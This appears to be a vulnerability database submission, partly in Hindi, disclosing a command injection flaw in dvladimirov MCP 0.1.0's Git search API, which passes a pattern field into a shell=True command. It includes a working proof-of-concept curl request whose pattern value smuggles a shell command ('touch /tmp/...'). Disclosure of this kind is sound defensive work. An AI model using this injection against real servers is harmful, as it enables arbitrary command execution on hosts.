जमा करें #802083: dvladimirov mcp 0.1.0 Command Injectionजानकारी

शीर्षक	dvladimirov mcp 0.1.0 Command Injection
विवरण	The Git search API accepts a caller-controlled pattern string and passes it into a shell command built with Python f-string interpolation. Because the command is executed with shell=True, shell metacharacters in pattern break out of the intended grep invocation and execute arbitrary host commands. curl -s -X POST 'http://HOST:PORT/v1/models/git-analyzer/search' \ -H 'Content-Type: application/json' \ -d '{ "repo_url": "https://github.com/octocat/Hello-World.git", "pattern": "\"; touch /tmp/dvladimirov_mcp_cmdi; #" }'
स्रोत	⚠️ https://github.com/dvladimirov/MCP/issues/2
उपयोगकर्ता	SmallW (UID 97245)
सबमिशन	10/04/2026 02:57 PM (2 महीनों पहले)
संयम	27/04/2026 05:01 PM (17 days later)
स्थिति	स्वीकृत
VulDB प्रविष्टि	359807 [dvladimirov MCP तक 0.1.0 Git Search API mcp_server.py GitSearchRequest repo_url/pattern अधिकार वृद्धि]
अंक	20

Want to know what is going to be exploited?

We predict KEV entries!